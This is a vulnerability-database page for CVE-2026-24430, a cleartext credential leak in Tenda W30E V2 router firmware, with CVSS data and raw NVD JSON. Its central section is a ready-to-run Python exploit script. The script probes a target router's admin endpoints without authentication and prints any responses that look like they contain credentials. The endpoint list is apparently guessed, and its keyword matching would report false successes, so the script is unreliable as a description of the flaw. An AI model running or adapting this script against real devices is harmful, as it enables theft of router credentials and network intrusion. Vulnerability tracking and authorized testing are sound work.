Security Vulnerability Report
中文
CVE-2026-24430 CVSS 7.5 HIGH

CVE-2026-24430

Published: 2026-01-26 18:16:40
Last Modified: 2026-01-28 20:16:52
Source: [email protected]

Description

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) disclose sensitive account credentials in cleartext within HTTP responses generated by the maintenance interface. Because the management interface is accessible over unencrypted HTTP by default, credentials may be exposed to network-based interception.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda W30E V2 固件 V16.01.0.19(5037) 及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-24430 PoC - Tenda W30E V2 Plaintext Credentials Disclosure Author: Security Researcher Reference: https://www.vulncheck.com/advisories/tenda-w30e-v2-http-responses-expose-plaintext-credentials """ import requests import sys import json def exploit_cve_2026_24430(target_ip, target_port=80): """ Exploit for CVE-2026-24430: Tenda W30E V2 credentials disclosure Args: target_ip: Target router IP address target_port: Target router web port (default: 80) Returns: dict: Exploitation result with extracted credentials """ print(f"[*] Targeting Tenda W30E V2 at {target_ip}:{target_port}") print(f"[*] Exploiting CVE-2026-24430...") base_url = f"http://{target_ip}:{target_port}" # Common maintenance interface endpoints that may expose credentials endpoints = [ "/goform/SysTool1", "/goform/getPwd", "/goform/userMng", "/goform/getUserInfo", "/admin/user.conf", "/cgi-bin/userMng.cgi", "/cgi-bin/admin/sysTool1.cgi", "/cgi-bin/getPwd.cgi" ] results = { "target": target_ip, "port": target_port, "vulnerability": "CVE-2026-24430", "credentials_found": [], "exposed_endpoints": [] } for endpoint in endpoints: try: print(f"[*] Testing endpoint: {endpoint}") # Try GET request response = requests.get(f"{base_url}{endpoint}", timeout=10, verify=False, allow_redirects=False) # Check for credentials in response if response.status_code == 200: content = response.text.lower() # Look for credential patterns credential_keywords = ['password', 'pwd', 'passwd', 'admin', 'user', 'credential'] if any(keyword in content for keyword in credential_keywords): print(f"[+] Potential credentials found at {endpoint}") print(f"[+] Response length: {len(response.text)} bytes") results["exposed_endpoints"].append({ "endpoint": endpoint, "status_code": response.status_code, "response_length": len(response.text), "snippet": response.text[:500] }) except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") continue if results["exposed_endpoints"]: print(f"\n[!] Successfully exploited CVE-2026-24430!") print(f"[!] Found {len(results['exposed_endpoints'])} exposed endpoints") return results else: print(f"\n[-] No vulnerable endpoints found or device not affected") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2026_24430_poc.py <target_ip> [port]") print("Example: python cve_2026_24430_poc.py 192.168.0.1 80") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 result = exploit_cve_2026_24430(target, port) if result: print("\n[+] Results:") print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24430", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.423", "lastModified": "2026-01-28T20:16:51.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) disclose sensitive account credentials in cleartext within HTTP responses generated by the maintenance interface. Because the management interface is accessible over unencrypted HTTP by default, credentials may be exposed to network-based interception."}, {"lang": "es", "value": "Las versiones de firmware de Shenzhen Tenda W30E V2 hasta e incluyendo la V16.01.0.19(5037) revelan credenciales de cuenta sensibles en texto claro dentro de las respuestas HTTP generadas por la interfaz de mantenimiento. Debido a que la interfaz de gestión es accesible a través de HTTP sin cifrar por defecto, las credenciales pueden quedar expuestas a la interceptación basada en la red."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B9C2BB-D36E-40F8-83FF-FC919337F6BD"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-http-responses-expose-plaintext-credentials", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.